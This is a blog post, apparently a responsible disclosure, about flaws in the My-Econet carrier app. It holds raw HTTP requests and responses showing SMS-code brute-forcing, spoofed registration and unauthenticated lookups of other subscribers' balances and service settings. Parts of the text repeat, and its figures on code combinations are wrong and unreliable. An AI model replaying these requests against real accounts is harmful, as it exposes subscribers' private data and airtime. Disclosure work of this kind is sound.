[Responsible Disclosure] Multiple vulnerabilities in My-Econet app affecting millions of Econet-ZW subscribers.
Summary:
This post is about multiple vulnerabilities on the "My-Econet" app. The multiple vulnerabilities allow anyone to access another user's account information( account balance), service status ( call waiting, forwarding, roaming ), remotely buy airtime for any Econet account and an experienced attacker can leverage this to remotely steal airtime from other Econet accounts. There also exists several potential Denial of service attacks.
At the time of writing this article, I had just contacted the Econet app team with a detailed summary of the vulnerabilities and solutions.
The app offers a range of features which many might find more appealing than typing out long USSD codes. However almost all of the features have one or more vulnerabilities which range from the mild (improper authentication) to the severe ( remote code execution, steal airtime from other user's accounts ). The app's security implementations are extremely lax and an attacker of any level could take advantage of these vulnerabilities to cause real damage and/or access confidential information
The list of vulnerabilities is quite long and I will only go into detail on three of the most interesting vulnerabilities and how they can be exploited. The video below demonstrates and shows how the vulnerabilities were discovered and the Python code provided illustrates how the vulnerabilities could have been actively exploited.
NB: I wrote this article before disclosing the vulnerability to the Econet team. However this article will only be published after the vulnerability has been disclosed in a proper manner. Please read the "Vulnerability Disclosure" page on this blog for the process and timeline.
Two vulnerabilities exist in the signup stage which could be actively exploited by an attacker.
1 Register Account (Vulnerable Request )
GET /appsAPI/authentication/register/0783******/466ce041-1343-1fea-0309-ae4ff5c78200/9774d56d682e549c HTTP/1.1
User-Agent: curl/7.38.0
Host: applications.econet.co.zw:8080
Accept: */*
HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 14:53:56 GMT
{"responseCode":"200","response":"Verification code sent to mobile via SMS","successStatus":true}
2. Verify Account ( Vulnerable Request ) SMS Code: 271825
GET /appsAPI/authentication/verify/0783******/77971074-c502-54a8-3787-ce7967e59924/19b02f77670437d2/271825 HTTP/1.1
Host: applications.econet.co.zw:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-GB, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7
Connection: close
HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 15:24:42 GMT
{"responseCode":"200","response":"You have successfully verified access pin","successStatus":true}
Lets break down the API call.
GET /appsAPI/authentication/register/0783******/<APP_ID?>/<ANDROID_ID>
The <APP_ID> parameter seems to be generated within the app and <ANDROID_ID> is the Android device Android ID. You can obtain your device Android ID by running ( http://android-developers.blogspot.com/2011/03/identifying-app-installations.html )
An attacker can spoof the <APP_ID> and <ANDROID_ID> and request an account on behalf of a user, an SMS code will be sent to be the target, who will probably ignore the SMS. The verify account feature however suffers from a bruteforce attack. The SMS code is a 6-digit code which means there are only 10,077,696 possible combinations, but the sms code is always 6 characters so the possible combinations are reduced to only 999999. An attacker could bruteforce this value and verify the account and use it as shown later.(Of course the attacker could just get the verification code from the SMS sent to the victim )
Vulnerable request ( Account Info ):
GET /appsAPI/accountinfo/all/0783****** HTTP/1.1
Host: applications.econet.co.zw:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-GB, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7
Connection: close
HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 15:25:33 GMT
{"responseCode":null,"response":"{\"responseCode\":\"0\",\"originTransactionID\":\"12\",\"serviceClassCurrent\":\"10\",\"currency1\":\"USD\",\"accountValue1\":\"-8250\",\"aggregatedBalance1\":null,\"currency2\":null,\"accountValue2\":null,\"aggregatedBalance2\":null,\"dedicatedAccountInfomationList\":[{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"1\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"2\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"3\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"4\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160704T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"5\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"6\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"7\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"8\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"9\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"10\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"24\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"25\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"26\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"27\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"28\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"29\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"30\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"31\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"32\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"33\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"34\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"35\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"36\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"37\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"38\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20140605T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"40\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"42\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"43\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"50000\",\"expiryDate\":\"20160103T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"50\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"54\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"55\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"56\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"59\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"61\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"100000\",\"expiryDate\":\"20140610T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"62\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"73\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"80\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"89\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"90\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"92\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"93\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"94\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"95\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"96\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"97\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160220T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"104\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"105\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"108\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"110\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20140610T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"111\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"115\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"119\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"120\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"122\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"123\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"145\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"146\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"147\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"148\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"149\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"150\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"155\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"156\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"157\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"176\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"177\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"185\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"195\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"203\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"204\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"205\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"206\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"207\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"208\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"209\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"}],\"supervisionExpiryDate\":\"20160727T12:00:00+0200\",\"serviceFeeExpiryDate\":\"20171025T12:00:00+0200\",\"creditClearanceDate\":\"20190422T12:00:00+0200\",\"serviceRemovalDate\":\"20200720T12:00:00+0200\",\"languageIDCurrent\":\"1\",\"temporaryBlockedFlag\":null,\"chargingResultInformationList\":null,\"offerInformationList\":[{\"expiryDateTime\":\"20160408T19:10:46+0200\",\"offerID\":\"330\",\"offerState\":\"0\",\"offerType\":\"2\",\"productID\":\"11\",\"startDateTime\":\"20160309T18:40:28+0200\",\"packagename\":null}],\"accountFlagAfter\":{\"statebefore\":false,\"activationStatusFlag\":\"1\",\"negativeBarringStatusFlag\":\"0\",\"serviceFeePeriodExpiryFlag\":\"0\",\"serviceFeePeriodWarningActiveFlag\":\"0\",\"supervisionPeriodExpiryFlag\":\"0\",\"supervisionPeriodWarningActiveFlag\":\"0\",\"stateafter\":true},\"accountFlageBefore\":{\"statebefore\":true,\"activationStatusFlag\":\"1\",\"negativeBarringStatusFlag\":\"0\",\"serviceFeePeriodExpiryFlag\":\"0\",\"serviceFeePeriodWarningActiveFlag\":\"0\",\"supervisionPeriodExpiryFlag\":\"0\",\"supervisionPeriodWarningActiveFlag\":\"0\",\"stateafter\":false}}","successStatus":true}
Vulnerable Request ( Services Status )
GET /appsAPI/buddieservices/263783****** HTTP/1.1
Host: applications.econet.co.zw:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-GB, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7
Connection: close
HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 15:27:18 GMT
{"response":"\r\nEnter command: RESP:1001;","roaming":false,"voicemail":false,"missedcallalert":false,"callWaiting":null,"prbt":null,"successStatus":false,"callForwarding":0}
From the requests its clear that no authentication token or HTTP-header is sent along with the requests. This simple means that this information was intended to be publicly accessible by anyone.
An attacker can just change the phone number in the HTTP request to get potentially sensitive information about another user. Freaky !!!
Description:
Econet Wireless Zimbabwe “My Econet” app is a selfcare application for Econet’s prepaid subscribers available for Android and other smartphones that will allow you to securely manage your Econet account from your smart device. Using the app Econet subscribers can get current balance information, purchase our social media bundles, find out the latest promotions on offer,· get directions to the nearest Econet Customer Services Centers, activate /deactivate Value added services such as missed call alert, international roaming, call waiting, voicemail and ring back tone. gain access to self care facilities for airtime transfer and overscratched cards.The app offers a range of features which many might find more appealing than typing out long USSD codes. However almost all of the features have one or more vulnerabilities which range from the mild (improper authentication) to the severe ( remote code execution, steal airtime from other user's accounts ). The app's security implementations are extremely lax and an attacker of any level could take advantage of these vulnerabilities to cause real damage and/or access confidential information
The list of vulnerabilities is quite long and I will only go into detail on three of the most interesting vulnerabilities and how they can be exploited. The video below demonstrates and shows how the vulnerabilities were discovered and the Python code provided illustrates how the vulnerabilities could have been actively exploited.
NB: I wrote this article before disclosing the vulnerability to the Econet team. However this article will only be published after the vulnerability has been disclosed in a proper manner. Please read the "Vulnerability Disclosure" page on this blog for the process and timeline.
Proof of concept video:
Proof of concept code:
Find on Github
Vulnerability #1 - App signup bruteforce
Opening the app for the first time, you gain access to the user interface but cannot access any services until a phone number is linked to your app. You provide your phone number and name and an SMS code is sent to your phone number. You can then enter the code to verify your phone number.Two vulnerabilities exist in the signup stage which could be actively exploited by an attacker.
1 Register Account (Vulnerable Request )
GET /appsAPI/authentication/register/0783******/466ce041-1343-1fea-0309-ae4ff5c78200/9774d56d682e549c HTTP/1.1
User-Agent: curl/7.38.0
Host: applications.econet.co.zw:8080
Accept: */*
HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 14:53:56 GMT
{"responseCode":"200","response":"Verification code sent to mobile via SMS","successStatus":true}
2. Verify Account ( Vulnerable Request ) SMS Code: 271825
GET /appsAPI/authentication/verify/0783******/77971074-c502-54a8-3787-ce7967e59924/19b02f77670437d2/271825 HTTP/1.1
Host: applications.econet.co.zw:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-GB, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7
Connection: close
HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 15:24:42 GMT
{"responseCode":"200","response":"You have successfully verified access pin","successStatus":true}
Lets break down the API call.
GET /appsAPI/authentication/register/0783******/<APP_ID?>/<ANDROID_ID>
The <APP_ID> parameter seems to be generated within the app and <ANDROID_ID> is the Android device Android ID. You can obtain your device Android ID by running ( http://android-developers.blogspot.com/2011/03/identifying-app-installations.html )
Secure.getString(getContentResolver(), Secure.ANDROID_ID);
An attacker can spoof the <APP_ID> and <ANDROID_ID> and request an account on behalf of a user, an SMS code will be sent to be the target, who will probably ignore the SMS. The verify account feature however suffers from a bruteforce attack. The SMS code is a 6-digit code which means there are only 10,077,696 possible combinations, but the sms code is always 6 characters so the possible combinations are reduced to only 999999. An attacker could bruteforce this value and verify the account and use it as shown later.(Of course the attacker could just get the verification code from the SMS sent to the victim )
Vulnerability #2 - Improper authentication
This is the last thing you would expect to run into. This vulnerability affects all of Econet Wireless Prepaid Subscribers...all 8-9 million of them. The vulnerability exists in the way the app request information from the server. Information requested includes, account information (current balance), services status( call barring, roaming, fowarding... etc ).
Vulnerable request ( Account Info ):
GET /appsAPI/accountinfo/all/0783****** HTTP/1.1
Host: applications.econet.co.zw:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-GB, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7
Connection: close
HTTP/1.1 200 OK
Connection: close
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: application/json
Date: Tue, 22 Mar 2016 15:25:33 GMT
{"responseCode":null,"response":"{\"responseCode\":\"0\",\"originTransactionID\":\"12\",\"serviceClassCurrent\":\"10\",\"currency1\":\"USD\",\"accountValue1\":\"-8250\",\"aggregatedBalance1\":null,\"currency2\":null,\"accountValue2\":null,\"aggregatedBalance2\":null,\"dedicatedAccountInfomationList\":[{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"1\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"2\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"3\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"4\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"20160704T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"5\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"6\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"7\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"8\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"9\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"10\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"24\",\"dedicatedAccountUnitType\":\"1\",\"dedicatedAccountValue1\":\"0\",\"expiryDate\":\"99991231T12:00:00+0200\"},{\"dedicatedAccountActiveValue1\":\"0\",\"dedicatedAccountID\":\"25\",\"dedicatedAccountUnitType\":\